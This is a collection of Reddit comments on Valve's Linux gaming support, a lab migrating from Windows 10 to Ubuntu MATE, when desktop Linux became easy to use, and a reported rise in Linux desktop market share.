This older post theorizes that they are making a profit out of it right now: https://www.reddit.com/r/linux_gaming/comments/dgvmkk/crazy_idea_what_if_valve_is_supporting_linux/
>What makes Valve the Linux company?

Fear of the Microsoft and Apple walled gardens.
I would say linux gaming is already prety good with wine/proton 80-90% of games now play on linux depending on how much tweaking you want to do more and more games are getting platinum rating i m not dual booting and keep in mind im a prety active gamers with lots of hours in games. a few weeks ago geforce now (or whatever it s called) has a chrome os version and worked perfectly for me on linux the games and allows us to play these games withobought having to download+boot into windows and also during covid i had to do schoolwork from home and even then i didnt had to boot into windows (i did it with libre office) and no teacher said that they cannot open/read the attachments i wrote this just to try to explain how far we ve come and also the companies epic games nvidia that do most if the bad things also do something good eg free games, nvidia geforce now (cloud gaming)
Initially it was a response against Windows Store and the threat of a completely closed windows ecosystem. Atm they are just maintaining the extra option and refining it as time goes by.
Simple, they just don't do games anymore...  It's much easier to port an app than a game.
[Epic gave Lutris $25,000](https://www.patreon.com/posts/lutris-is-epic-31951429)

That's not nearly as much as Valve has done (paying Linux developers' salary for years now), but it's not nothing. 

Certainly more than any other major player, besides Valve, has done.
the one thing that keeps people from adoption is definitely not games
aside from breaking out of Microsoft monopoly, Valve is open to new approaches. you can play your games, you can stream your games. you can switch operating system. you can easily build a set top box machine for gaming, VR is well supported, etc.

if ARM or something else takes off on desktop, Valve is pretty much ready for it. they have the client that is likely easy to port to new platform, and they have tested path of creating linux games. most developers would simply have to rebuild their games for new, emerging platform, if they have linux support.
For a lot of companies, porting to Linux is not a good financial decision. As much as we would like to pretend otherwise, Linux gamers account for such a tiny portion of the total population of gamers that you may end up spending more money porting it than you'll get in return. I think Valve did it because they saw Linux as a mostly untapped market, and with a huge amount of reliable cash flow coming from Steam, they could afford to invest the effort and wait a few years for it to be profitable. I don't know their exact motivation, but I wouldn't be surprised if porting their games to Linux was just a bonus and their main goal was to port Steam to Linux, since that opens up a new market for their massive storefront. Other companies like Blizzard, EA, and Epic have much smaller storefronts so they wouldn't make nearly as much money by doing the same thing.

Wine also muddles things a bit. If a game publisher sees that people are able to play their games just fine on Linux using wine, they won't bother porting it since it likely won't result in many additional sales.
Most game companies are public. They have to earn their shareholders a profit each quarter/year and if not explain why. Everything in the company revolves around this debilitating handicap.

Valve is a private company. It answers to no one but its owners and we don't even know if it's owners care about profits per quarter or what they care about. As such it's possible for them to work on projects that operate on a much longer time scale.

This is kind of one of the main pain points of short term investor capitalism, everything exists for the now and so everything is as minimally good as possible, while still being good enough to satisfy most people. Nothing great gets created.

Blizzard and EA can make very high quality games because they can prove a ROI on it. But they could never do what valve is doing with Linux because it's too long term for companies of their structure. They simply can't feel that far ahead.
I just wish xbox and playsttation would move to a linux os so games could easily be developed for both systems and PC.
It's rarely profitable to make games for marginal platforms.
Because its customers do.
Because they have too.

They donot own the OS they operate on.  Its the only leverage they have on Microsoft.

Its the same problem as with facebook. They too regret not making an OS.
Valve is laughing all the way to the bank.
I respect Valve and its owern/CEO. I've seen this interview. Steam and many games like CS:GO, CD, Team Fortess 1, 2.. etc. are owned and developed by them. Made them f2p. Just like me he's a Linux guy do it makes sense providing their platform to Linux.
At this point you have to specifically target windows and not linux to run games. Unity ships to all platforms out of the box. Why cut off future market share that will grow?
Maybe not the ONLY distinguishable thing keeping people from adopting Linux. But yeah, playing GTA V in with the Epic Games/Rockstar launchers in Linux under Wine was...average...
Because linux is fragmented like crazy.
[deleted]
Because the Linux userbase is still very small.
Linex is an open platform and everyone can use that why gaming company valve seemingly to take Linux seriously, and the gaming company earn more and spend less, i also play games online through the best [**gaming companies**](https://gamingmonk.com/).
They started supporting Linux after Windows 10 came out and had it's own software store. They want to make sure that if they are ever locked out by MS they can still sell games. Valve is probably primarily a gaming store. I am sure they make more through Steam than any of their games.
Sony took BSD seriously when making an OS for the ps4.

GPL sucks for business. Why make a competitive game engine or software package when you have to give it away at release? It just doesn't work for large companies.

There's a million reasons, but the fact remains windows is still the majority market share. Why leave money on the table when it's most computers? Valve sees value in a non microsoft controlled OS and it will eventually replace windows in a large way. The only thing stopping linux from doing this is the polish and a lack of productivity software. Freeoffice is way better than libreoffice out of the box. If the adobe suite ran on linux a lot more people would use it.
Games are not the only thing keeping people attached to Windows. That may be your experience, but it isn't mine. For myself, I have to use Windows for MS Office compatibility.
I'm not sure what you mean. Nearly all of the Linux games on Steam aren't made by Valve, so Valve isn't seemingly the only gaming company to take Linux seriously, given all of the companies that provide games for Linux.
Imagine a nuclear bomb the size of a small SUV strapped to your crotch. Now imagine the CEOs of Apple and Microsoft each have a detonator. Oh, and so does Google.
It’s simple. The year of Linux desktop never came.
Valve also understands the power of Linux. One day Wayland + Rust kernel and Vulkan will deliver more performance than Windows ever could.
I am really, really shocked right now.  I migrated our R&D lab (we are a very small team that develop automated scientific instruments) from Windows XP to Windows 10 last year, solving a lot of issues with well, everything, and using VMs to run old windows XP custom data loggers for instruments (weird custom serial APIs).

However, the forced updates, lock-screens, and unsigned-driver issues (serial port adapters, USBASP programmers, etc.) with Windows 10 have been an absolute nightmare.  Its been whack-a-mole with problems due to the changes made on Windows 10 (every other system update requires redefining COM ports), and any attempt to be "future-proof" utilizing Microsoft platforms has proven to be a an exercise in futility.

We've been able to leapfrog a few technologies and migrate to very simple cloud-based data storage of instrument testing data (for R&D and for customers), and in doing that we started building up some rudimentary Python & Javascript understanding in house.  Just enough to let us have our IoT systems send data to different cloud-hosted databases.

On a lark I started investigating python-based serial data logging capabilities rather than trying to make our VB-based custom codebase from 20 years ago work.  It is night and day compared to what we used to do.  My AARP-age Ph.D-holding colleagues are buying books on R, Python, Javascript, and Plot.ly after seeing what I was able to do in 3-4 days from a almost 0-coding experience level (Basic when I was a kid, and C in highschool for a class).  

10-20 years ago it was a huge pain to run Linux and open-source software for most of what we do.  Now we have 40-80 line cross-platform scripts that are replacing hundreds of thousands of lines of custom VB code, letting us simplify our instrument data logging APIs.  The robustness of these platforms and APIs today is astounding.

We're now migrating all of our R&D lab workstations to Ubuntu Mate with Anaconda, Plot.ly, Node, and AWS's SDK.  It is absurd how much easier and more effective these platforms are now compared to the offerings from Microsoft.  The MS platform seems user-hostile in comparison to Mac or Linux.
I think Windows 10 is especially painful for non-personal computers unless you invest yourself in the enterprise tools.  Disabling all the "consumery" stuff on Win10 (and keeping it that way) is a science project.  It boggles the mind how you can market a "Pro" OS for business that comes with Candy Crush and Xbox stats preinstalled.
I think a big turning point was 2012 or 2013, right around the time that Windows 8 released. That's when I started using Linux full time, and it surprised me then how easy it was.
> old windows XP custom data loggers for instruments (weird custom serial APIs).

It's good that you recognize these are just undocumented or proprietary APIs over serial. To most end-user techs, there's a driver compatibility issue keeping the application on XP, but they don't recognize the exact nature of the dependency. Depending on your business, you should give consideration to explicitly supporting Linux for your users, or documenting or open-sourcing the code required to support these things far into the future.

Microsoft recognizes many of the advantages and is trying to profit from them with WSL (Windows Subsystem for Linux) while not letting its competitors profit in the other direction from the compatibility.

\>  20 years ago it was a huge pain to run Linux 

Welcome to today times!

\>  It is absurd how much easier and more effective these platforms are now compared to the offerings from Microsoft. 

You are perfectly right. I have a lot of friends who started used Linux in last year or 2. I think the Linux distribution and desktop environment are mature enough to satisfy every user taste and needs. Also, automated installers played a huge role I think.
When you didn't have to touch xorg.conf
It kinda sneaked in while nobody was watching and everybody was busy.. hehe. You should try producing music on Linux. Even though we still have very limited highend proprietary software for it on the market and has to use tricks and hacks, the system, low latency possibilities and the stability of the kernel is like a very good dream, while windows has starting to become a nightmare.
Linux has been steadily improving since forever. When Windows stagnated by XP times, both reached parity. When Windows 8 was released in a huge backward move, Linux was suddenly ahead.
6 months ago I got a new MacBook as my first ever Mac computer. This is after 8 years of having Ubuntu and Arch as my main operating system. And boy that was my biggest mistake.

Windows update has to be the worst part of Windows, it's gotten worse in every new version of Windows.
[deleted]
I also work in a small lab and run the IT there. Got a few Win 10 machines and a few linux (xubuntu) ones.

I have always used linux but understood the windows use-case. That opinion is fading with Windows 10 - it's a fucking mess. The PCs are standalone so they suffer from the full barrage of updates, ads, cortana bullshit.

You are shocked that linux got ok to use. I am shocked that Windows got so bad!
Everything after Windows 7 has been an absolute shameful abusive shit show.  So win8-ish.
Yeah indeed, I reboot to Windows 10 for a quick gaming session (yes evil me) and 12 fires start burning while it tries to sell me minecraft in the start menu and force reboots all at once.
>  The MS platform seems user-hostile in comparison to Mac or Linux.

Linux has been very usable  since about 2008 or so.  Windows has been getting worse.   I  don't know why anyone wants to pay for digital handcuffs.
no offense, but if you could replace hundreds of thousands of lines of software with 80 lines of custom-made python scripting, could it be that you are using the wrong software for the wrong job all along?
Python is the bomb-diggity. 
 
Do yourself a favor, grab a Raspberry Pi and use the python pi libraries to access the input output header. You will be making your own internet of things devices in no time.
 
My company had to quickly pitch something to another company for integrating sensors into dumpsters and threw that into Salesforce. Using a Raspberry Pi with a motion sensor, a range finder, and a few other Nifty Things wired into the io header, and python to read it all and write into Salesforce, we blew them away and sealed a deal.
 
[deleted]
My personal two cents: it's also because much of the industry smells money and vendor lock-ins. Thus, everything needs an account nowadays, even the NVidia application to manage your graphics card. This creates a very predatory nature towards the end user.
> It is absurd how much easier and more effective these platforms are now compared to the offerings from Microsoft. The MS platform seems user-hostile in comparison to Mac or Linux.

I would say that Linux is more user-oriented and user-friendly because ever since Win8 and the lessons of Google, MySpace, and Facebook MS has been trying to monetize users (and their data) instead of selling to them.  By definition that is a user-hostile stance, and it really really shows.

Linux, by comparison, is driven both by users and is intended primarily to facilitate end user activities - the difference is night and day, particularly given how ham-fisted MS is in trying to implement end user monetization goals.

Personally I think that's one of the reasons MS has become more Linux friendly - they no longer see it as competition if the end goal is no longer to sell operating systems but rather to get their grubby little hands on users *via* the OS.
[removed]
> Now we have 40-80 line cross-platform scripts that are replacing hundreds of thousands of lines of custom VB code, letting us simplify our instrument data logging APIs.

I love linux. Work in it for 99.9% of what I do for work. But this sounds less like a Windows vs Linux issue and more of a legacy codebase vs rewriting with modern tools. 
I first tried Linux in February of 2015 when I was 18. I would often google things like "how to use ps3 controller in windows 7" cuz I was a windows user. But, google would autofill "how to use ps3 controller(or whatever else) in linux". So I assumed Linux was hard to use. I had heard about it for years, and just took it for a spin one day with Linux mint 17.1.

It blew me away. I had tried to dual boot with Windows8, that didn't work for some reason, but I had a spare laptop running windows, so I felt comfortable wiping it, I knew I'd have something to go back to. I did have to spend about 2 hours before I got wifi working, but after that, it was smooth sailing. I got into software development in the coming months(thanks to Linux), and using Linux has been way easier. I would never even think about trying to use windows for Ruby on Rails development, or pretty much anything else I do.
It's like locking yourself into freedom.
Linux has been easier to use than windows since around 2008. The only reasons I've gone back to windows

* Games
* Adobe suite for interop with client file-formats
* Microsoft office for fixing issues with client file-formats

Nowdays I just have a windows laptop that I can play games, and do weird shit on. Most other devices are Linux. My wife had to wait nearly an hour, even with a relatively modern CPU, 16GB RAM, Sandisk SATA SSD 500MBs/500MBs because she runs windows 10. The OS is only any good if it's

* on all the time (for bg updates)
* you hardly use it

For businesses, I think taking drugs must be step 1 of the 5-step program to use Linux.

I thought it was laughable when Windows got the native ability to mount ISO's as I'd been doing it for over half-a-decade on Linux. 

* I could run a mac-OSX like dock on Linux (although it's a shitty design so I don't)
* linking files and folders, and keeping parity with online servers is easier with Linux.
* Searching for files is easier with linux
* Doing CLI things, or expressing desired state with Linux is easier.
* Upgrading software with Linux is faster within distro-channel. 
* being able to compile a patched driver for my MT7601U for 14.04 would have been impossible without Linux and it's ecosystem.

I won't say Linux is "easy", heck computers are not easy, but when you have to google search for how to add a non-microsoft local user in Windows 10, you know there is something wrong. When there is a screen in `msconfig` telling you to open task manager to get to what has been there for > 10 years, you know there is something wrong.
It's not that *nix isn't user friendly, it's just a little bit picky about who its friends are. 

Even in the 80s xenix was better about getting the business done than, well... let's just say Windows started out way behind. Yeah each version Windows becomes more Unix like.
I know everyone here hates MS, but I've been quite happy running WSL for my device environment at work.   Git is actually responsive in it, which it isn't natively in Windows.  Along with VcXsrv I can even run gui applications (fuck you Atlassian can't you just make CLI tools?)

If only there was a decent way to migrate my env to my new laptop (without setting up an SSH server on one)
If you're technically savvy and able to code you'll find working with Linux quite easy. If you're not then you're going to have more difficulty especially when you find hardware issues - anyone with a recent Nvidia card is going to have real fun even trying to boot a Live distro.
Microsoft has been working very hard to get Windows's usability on par with Linux.
I hope you don't mind, I made a video response \- [https://www.youtube.com/watch?v=nXn95h2WpXI](https://www.youtube.com/watch?v=nXn95h2WpXI)
1991
I think the introduction of package managers and with the help of volunteers to maintain those really made a difference with the ease of installation and updating those programs.
For me it's been this way since ~1998. That's when I was introduced to it existing.

I had been used to MS-DOS and windows 3.1, and windows 95 simply broke tons of things for me - most importantly, my backup software no longer worked properly, and there was no way to make it do so. The lack of long filenames support in historical MS-DOS applications prevented me from doing anything *with* them.

To restore files using the windows backup program was worthless - I'd have to install the OS *before* I could restore any of the files, which totally negated the entire reason for the backups in the first place. All I could really do was backup my user files - configuration data, such as files and registry entries was not possible.

By 1998 my install of win95 was barely working at all, and I had lost the install cds. In messing about with a linux installer, I accidentally discovered that it had a backup tool *in* the installer, and better yet could read and write long filenames on the windows partition from console. All it needed to do this was two floppy disks.

I had an epiphany in that moment. Do you have any idea how incredibly frustrating it was to find out that an operating system that I didn't have to pay for can do the *exact thing* the one I paid for can't - and I don't even need to INSTALL the thing to do it?

The installer was showing me bare metal recovery was possible with linux, for a *different operating system* - as well as itself.

Both linux and windows have gotten a lot of polish since then - but linux has always been able to do backups and restores from a recovery disk, usb stick or what have you - and I still rely on it for that.
Tarivald  and Stallman deserve Nobel prizes.
Yes but Linux stuff fails on certain things. I tried connecting to a blue tooth device the other day on my laptop running Ubuntu 16. No go. Something like that would just work on Windows. I know some will say thats the hardware vendors, but I go back to saying it just works on Windows. There are many other examples of this.

With that said I've been using Linux 100% since 2010. I do so primarily because I'm a web developer / devops. And because I think gaming is a scourge on my life and well its just harder to game on Linux than Windows which is fine by me. I'm much better off coding, watching a documentary, reading a book, or even wasting time on reddit than I am gaming.
I keep trolling my co-workers threatening to install linux over the OS X install on our conference machine. I really don't mean to be this obnoxious... I just don't get how I'm literally the only person I know who's into Linux. To me, it's a no-brainer. Like. I don't hate Windows or OS X, but... why use them without going down 9,000 rabbit-holes of linux distros, window managers, package managers, etc. first. People are only doing themselves a dis-service by not learning everything they can about Linux.


I used to be less aggressive about this. Like, I get that computers just don't matter to so many people. But that's changed, like, a lot in the last 10 years. Now everyone and their pet hamster wants to get into "coding", app development, etc. Primarily into macOS. And that's cool, I mean it's a free country (troll face). But just like... spend 10 or 15 years using linux, *then* go back to macOS for that kinda shit. Like, ideally, learn every operating system there is. Learn vxWorks, HaikuOS, learn how to play PS4.

ehh.

/rant
[deleted]
Check out the Bokeh application framework for Python - you'll be able to build complex web-based visualization dashboards from serial data in like a day. Your productivity will go through the roof.
It's great that you found Linux to be a better match for your needs, but most of what you're describing are available on Windows too, including Anaconda, Plot.ly, Node, and AWS's SDK. Forced updates are easy to turn off and lock screens are a thing in Linux as well, they're optional on both platforms. I don't know about having to redefine COM-ports after updates though, you might be right there. Not sure what you mean with trying to be future proof with Microsoft's platforms, but if you're referring to VB, that was considered old a long time ago. I agree that open source based platforms are a better choice for longevity, although it's not perfect. Look at Python 2 for instance, and don't use it in new projects. It looks like you're comparing new tech that's available on all platforms to your 10-20 year old tech, and anything is going to look advanced next to VB on XP.

As a sidenote, I don't see the point of using both Node and Python if you're starting from scratch, I think it's just an unnecessary dependency, but maybe that's because I don't really like Javascript that much.
Oh, there are so many reasons why Windows sucks, and this is a path they've been following. The difference is that Microsoft's codebase has become so huge that it has reached the point of being unmanageable.

So we have the registry, the ever growing registry... and then we get greed in the mix and end up with Microsoft removing administrative tools (like secpol) that allowed a power user to manage their PC. Their terribly flawed approach at security has turned Windows into the favorite target of viruses and malware.

And then there's change for the sake of change. Remember when they removed the ability to have a quicklaunch bar? THE quicklaunch bar that was so popular that now we have a set of instructions that tell us how to get it back in the more modern versions of Windows.

In comparison, it becomes a no-brainer to understand why Linux has become so manageable compared to Windows: Linux devs work as a not only as a team, but as a giant ecosystem. Together, users work as beta-testers, and developers work with each other to try to make things easier for one another, with no bottom line.

Microsoft, on the other hand, is monolithic, and fractured: Instead of improving something, or even invest a little and let the users decide which tools are the best, they don't touch old tools and try to make everything new because they can't maintain their gigantic codebase.

And since they become incompetent at what they do, they focus more on the legal and commercial sides, lobbying and making deals with hardware manufacturers so that we can'tdisable secureboot and then use an  alternative OS in our machines.

Microsoft is a dinosaur. Linux is the small rodents that become more adaptable. Linux software are the species that keep evolving through a user-guided evolutionary process. If something doesn't work, or is too complicated, it dies.


EDIT: Phrasing.
I still find myself swearing at my computer at work when clicking my mouse wheel doesn't paste anything.
Ubuntu was really designed around making the bar for entry REALLY low. So within a couple of minutes of being online you are productive. 

Back in the day, you literally could be in serious trouble without a degree in CS, when installing Linux. Cannonical/Debian, Red Hat/Fedora/Centos and others have made it such that installing is not nearly as painful as it was. 

For implementations like Ubuntu and Centos for most purposes - you do not need to be technically inclined at all.
Back when I was in 10th grade (umm, 16 years ago, ouch), I tried to move my family computer to Linux and failed with every distro I could find. These days it definitely takes less time to get Linux setup since most things work out of the box, i.e., there are usually no drivers to install, and all other software can be installed from the command line. I'd be done with Windows altogether if not for Native Instruments' stuff, whose licensing/download app just barely doesn't work with Wine.
2006
I think MS has realized the same. 
Just thousands of talented people who care about doing something really well. Tarivalds and Stallman deserve Nobel prizes for what they've done to advance humankind. Congrats on taking the red pill.
You can access COM ports with Wine on Linux. I used this to communicate with some older PLC with success :)
I don't think it's fair to blame windows or any other operating system for the technical debt your organization has accquired...
> Its been whack-a-mole with problems due to the changes made on Windows 10 (every other system update requires redefining COM ports), and any attempt to be "future-proof" utilizing Microsoft platforms has proven to be a an exercise in futility.

Windows Feature Updates basically reinstall Windows. That's why it's causing you issues. You need to set it up to automatically deploy the required settings. A poor man's approach would be to use DSC (or, better yet, a third party configuration manager like SaltStack or Puppet) to automatically configure the machines correctly.

Alternately get your organization to pony up for Windows 10 LTSB.

> On a lark I started investigating python-based serial data logging capabilities rather than trying to make our VB-based custom codebase from 20 years ago work. It is night and day compared to what we used to do.

VB is to Python what PHP is to Javascript. Hardly anyone is using it for new projects anymore. Even Microsoft is deprecating it.

> Now we have 40-80 line cross-platform scripts that are replacing hundreds of thousands of lines of custom VB code

You're probably calling on modules that are at least as complicated, just not custom written.

> It is absurd how much easier and more effective these platforms are now compared to the offerings from Microsoft. The MS platform seems user-hostile in comparison to Mac or Linux.

... You're trying to shoehorn 20 year old software onto a modern version of Windows, and comparing the results to a much more recently developed FOSS alternative.
People say Arch Linux is unstable, but hey, it's way more stable than Windows 10. 
Jumped off the Windows train when I saw Windows 8. Read the EULA for Windows 10 and I then swore I would never go back.
I game and do internety things on a KDE Solus partition (Patreon ISO). I do my work on a Debian Stable Gnome partition. Some graphic design, video & audio editing. Some collaboration work with a small team (they are all on Windows) 
Started to learn to code last week (self teaching with an occasional mentor)


For desktop? Vista/Ubuntu 8.04 LTS. (2006/2008)  
For servers? I always though Debian Sarge (2005) was a huge step up in that department.

Also, congratulation and welcome to the future of $CURRENT_DECADE. It's only going to get better as you shed the constraints of old.
all the new versions of windows fuck shit up way more than it needed to be.

win7 is the one true god.
I started to use Linux in the days of XP. But recent versions of Windows, specifically those post 7, finally convinced me to switch over full time.

Also, Microsoft stabbed me in the back by selling me Windows 7 and claiming that it would get support until 2020, but then they cut me off of critical updates when I upgraded to Ryzen.

https://www.theregister.co.uk/2017/04/19/chap_fixes_microsofts_windows_7_and_8_update_block_on_new_cpus/

If MS didn't want to be stuck supporting Windows 7 until 2020, they shouldn't have posted that date. And If they can't bother to honor commitments with products that they already sold, I have no reason to believe they will honor commitments they are making today.
Been using linix since ubuntu 7 or so on home pc in high school after porn virus. Had to get install disks mail ordered. Struggled for days learning had to partition disks when the hardest tech was video games. 

Everything got user friendly when automated partitioning became a thing.

I started dabbling in the early 2000s, ended up liking it and wish more people would discover it.  I realize most people just want something that works and a number they can call when it doesn't, but here's some great things about GNU/Linux distros that they're missing out on.

1. Creating your own experience.  I hate convergence and the wasteful treatment of screen real estate, and I hate being pushed into someone else's idea of how my computer should work.  Linux has given me the option to set up my system how I want, with the functionality I want, and without the "functionality" \(lol\) I don't want.  It also provides people with very different preferences that same opportunity!  I dig that.
2. Being the user, not the used.  I want to personalize my experience for my needs, not to help a company push its agenda of how users should interact with their systems.  Quality software is its own advertisement and if I find software I like that doesn't abuse the user and gives him/her the power to set up their system efficiently and effectively, I share that info with people who need that type of software.  I'll also eventually find my way onto your website/github/bugreports/etc.  Software should focus on helping users accomplish their goals, not feed off of their effort to generate profit for companies, steal their data, or steal their time by sucking them into never ending streams of workflow\-breaking notifications.
3. Using an OS that's not a platform for ads/data\-mining.  I don't want to be advertised at, I don't care about your branding or your "other products."  If your software is good, that's the only thing that can get me to use it.  Not emotionally manipulative ads, not nag screens, not bundling it with other crap, not data\-mining the hell out of me to help me "personalize" my experience.  That actually makes me LESS likely to use it.   I'm very anti\-branding and hate how companies co\-opt our language, so I REALLY like how xfce lets you use generic program names like "web\-browser" instead of the brand name of that software.  The "user experience" talked about by commercial OS's is the experience of the users who are using it to data\-mine you and sell you shit, not your experience as the end user.  Customization and freedom is key!
4. Supporting software you love!  Open source gives us the opportunity to contribute to software we love.  You don't have to be technical to write documentation, report a bug, or give feedback on a forum.  Since so much of the Linux ecosystem is open source, it provides an unmatched opportunity to have a system that grows as a companion to compliment it's users, rather than a parasite to feed of them for the benefit of its sponsors.  I encourage everyone to, at the very least, drop the developers of their favorite programs a line and let them know what you love about their work.

I'm excited that Linux is at the point where the benefits are outweighing the downsides, even for many casual users.  We have to remain vigilant though, so desktop Linux doesn't become another Android.

Thanks to everyone who makes desktop Linux possible.  You people are the best and, whether you realize it or not, you are making the world a better place!
> The MS platform seems user-hostile in comparison to Mac or Linux.

"user-hostile" is a very good way to describe it
Looks like you simply don't know how to use Windows in a workplace environment - all of your complaints regarding the OS (not the old code, its stupid to blame an OS for poor code thats 20 years on) are easily fixable and should be part of your basic setup.

Heck you can turn off the automatic updates restarts or change it to a schedule that suits inside of 2 minutes of googling and applying, for example.
Linux has been better than any other offering for at least ten years. Probably has been better since the big kernel lock was removed.
1994
the forced updates are a problem for me too, i would uninstall one that ruined gaming performance frequently only to find a forced reinstall of that update. Linux one the other hand is super stable even with an arch Linux install that i frequently break (although when this happens its always my fault and is fairly easy to fix). i wish microsoft understood that most users don't have a clue when it comes to increasing stability, for me as a computer geek it took me months to figure out how to block an uninstalled update from reinstalling and i just can't see why uninstalled updates aren't blocked automatically as since you went out of your way to uninstall it there would be a good reason for it most of the time. unfortunately though my favorite games don't run in Linux and don't run in wine all that well, even on compatible games it really decreases performance
You're welcome, even though we still have a lot to improve ;)
+1 for Ubuntu-Mate, I love it. 
try installing microsoft office for someone else, you have to know their life history.
I'd say Linux overlook Windows in the "user friendly" department between 4 and 6 years ago. Depending on how tech savvy the user is. 
[deleted]
I started at the suggestion in 2004/5. Wireless was a bitch, but otherwise I was having a good time.

I've been having a better and better time ever since, no doubt about it so hard Gwen Stefani can sing about it. I forget what the final straw was, but about 6 years ago I went full "Fuck This Shit" and have been doing Linux as my primary home OS ever since, no regrets.
Linux has definitely come a along way. It used to be such a pain to get hardware to work 10 years ago, to get codec support, to get sleep working, and to have a desktop interface as useful as windows. I am very happy with all the wonderful work going on nowadays. Even the most complained about problems are pretty minor compared to what we used to have to deal with. Linux makes my life easier. I use it out of convenience.  
You should wait until next week to upgrade to get the new LTS release of Ubuntu. Support for it will be good for 5 years.
Since about 5-8 years ago
about 2001. seriously who wants to mess with drivers, antivirus and downloading  software from websites? programming on windows is a particular nightmare (not much better on mac).
Since at least 2002
For me, about 13 years ago. But I do research/work in bioinformatics, involving a lot of processing of very large text files (now getting up to a few hundred gigabytes compressed), and a GUI is almost completely useless for that.
For me, 2006
https://www.netmarketshare.com/report.aspx?qprid=11&qpaf=&qpcustom=Linux&qpcustomb=0
What happened?
+1.3% in 3 months? Something feels sketchy.
Woo woo woo, this year is Linux's year
I've plotted the data using logit scale and differences . . . might be clearer, what's up.

 * https://i.imgur.com/JxNi533.png

Seems we're taking the share from windows.

 I made the same plot for Internet browsers:

 * https://i.imgur.com/FmX11IZ.png

---

gist https://gist.github.com/jonnyrobbie/4ad1741ec49c61b126595ac0b49aea71
I converted 100% this year. Windows 10 pushed me over the edge. I wiped it 9 months ago and haven't looked back. Using Arch on the desktop and Debian on the servers. 
Well, I converted to 100% Linux this year. I'm probably not alone.
Does this represent Linux really growing? Or is it the desktop market shrinking as more people use phones and tablets instead?

I think Linux is gradually getting better, but I haven't seen anything that would particularly make it spread quicker this year than the last few years. But maybe there are trends elsewhere in the world I don't know about?
It's starting to rival macOS in market share now. This is a great sign.
[deleted]
For desktop, ok, but only if it includes Chrome OS. Overal it should be a bit higher, if you include all devices, including phones and tablets running on the Linux kernel, including Android. 
I can only imagine it getting to 13.37%, what a memefest will it be.
[deleted]
Looks like some crazy growth in the June - Aug period on the chart.

Maybe a lot of students have gotten their Chromebooks before school starts in Sep 1.

Not that it matters much, I consider ChromeOS a limited Linux desktop which can be quickly made full-featured with Crouton.

BTW: It seems like you can have native GTK windows on ChromeOS with Crouton. Crazy.
10% more to go. Then we'll be cool.
FreeBSD remains unchanged at 0.00% :(
Does this include ChromeOS which is really Linux.   Saw that ChromeOS grew 38% YoY.

http://www.pcworld.com/article/3194946/computers/chromebook-shipments-surge-by-38-percent-cutting-into-windows-10-pcs.html
Chromebook shipments surge by 38 percent, cutting into Windows ...
Good.
Seems like Linux has taken share from both Windows and macOS in similar amounts.

So not only people hating Windows 10 but possibly dissatisfied macOS users as well.

I wouldn't be surprised if some kind of intensive migration were to be happening among application developers due to these:

* the server stack is typically Linux anyway, so why not get closer to production in the dev environment
* dev tooling is very strong on Linux (IDEs, same server sw as in prod, Docker is fastest here, ...etc)
* Linux desktop environments have come a long way in recent years, they are ultra-powerful and customizable (KDE Plasma + Cinnamon user here)
* hw support has been improving leaps and bounds too (just bought a cheap Acer for a family member and Linux mint runs like a champ on it)
Why the uptake when the summer came around? Maybe college students everywhere trying their luck ? 
I work in a building that has maybe 40-50 people.. I was thinking a while back that I was statistically probably the only person in the building who uses Linux.. then just the other day I was walking outside next to some offices and glanced into someone's window and saw the Linux Mint logo on a guy's laptop background. 

It's small potatoes but it felt kinda cool to spot another linux user in my building.  :D
And Windows XP still has 6%, an OS released 16 years ago LOL!
That curve is impressive! That's the big news here, the traction.

I'm also getting by mostly with Linux these days, other than gaming^\* and photo management. I think I'll give darktable another try though, it crashed on me a few years ago. I'd love to get something comfortable going there, both as for library management, RAW imports etc, and post-processing, to replace Lightroom.

^\* GOG Games often impress me though! I can do probably ~70% gaming on Linux already.
It's 1.79% [according to statcounter](http://gs.statcounter.com/os-market-share/desktop/worldwide)...
http://www.zdnet.com/article/net-market-share-vs-statcounter-whose-online-measurements-can-you-trust/
I am glad I contributed for the number. Longtime Windows user, had tried linux multiple times earlier but always went back to Windows after 1-2 days.
This time I'm using Ubuntu 17.04 from last 1 month, I am kinda getting used to it.
I switched my desktop to 100% Linux this year and haven't looked back. After all the forced updates and then the ransomware thing pushed me over the edge.
Did anyone say KB4034664? :D
Where is OSX? That should be our primary target right now, not Windows.
what caused the big jump in august?

Reasons I strongly believe this comes down to chromebooks:

  * ChromeOS is not listed anywhere else with its own stats.  Not under mobile, not under desktops.  BSD and Solaris are, and I refuse to believe those are more significant that chromebooks.  Ergo, Linux must be lumped under Chromebooks.

  * Google just announced a big "[Chrome Enterprise](https://enterprise.google.com/chrome/chrome-browser/)" thing for Chromebooks in business.  May have sparked interest.

  * School just started.  Many schools are now issuing or requiring chromebooks for students.

  * Statcounter has ChromeOS going from 0.45% to 0.56% during the same period (July to August), and Linux staying flat.

  * Firefox usage continues to drop.  Although you can install Chrome on any linux distro, and many people do, Firefox is the default browser on most major distros.  You'd expect some kind of bump if millions of people were suddenly switching to e.g. Ubuntu.

Reasons why I might be wrong (and I actually hope I am):

  * The "other" browser category went from 2.29 % to 3.23 % in the same timeframe.  This is browsers that are not Chrome, Firefox, Safari, Edge, or IE.  Chrome and Firefox went down.  What the heck 'other' browser is taking off and gaining almost 1% of market share??

...please give me some more.  I WANT TO BELIEVE.
Let's see what they will release today.
[deleted]
Converted mostly to Linux this year. Maintain on Windows machine for gaming on the Living Room PC for VR.
Now if we're counting every Linux powered network switch, firewall, etc in the world... 

85%.
This is huge.
Same I switched back in May, and I'm not planning going back to W10
So about half of a Mac.
I installed my first dedicated Linux PC last week. I hope it helps!
Is this statistic being created by using third-party tracking? Because I block all that and I'm not about to unblock it.

I suspect tracking scripts are far more popular than user agent strings in local server web logs these days.
How can they actually determine how many people use which OS? Just looking at the User-Agents of web-browsers would be pretty inacurrate because it's easily fakeable and highly depends on the website that collects this data...
I'd hope that the trend will continue to improve the overall quality as well. I'd hope that at least the less well-off countries would use it more. 
Quite an uptick these last 3 months. What happened, that hasn't happened before?
That is bigger than Apple market share from 1997.  
Last year it went up in July and back down in August: https://www.netmarketshare.com/report.aspx?qprid=11&qpaf=&qpcustom=Linux&qpcustomb=0&qpsp=200&qpnp=24&qptimeframe=M
If linux reaches the critical mass say 15-20% 

They will attract More hardware and software support;
Convergence will happen;
Bugs will be fixed quick;
Will be more stable and polished;

Cascadingly more and more people will use linux.

All i meant to say linux will reach 90 from 20, much faster than what it would take to reach  from 0 to 20

Eager to witness that day!
Might be due to the Raspberry Pi, they just keep getting more and more popular
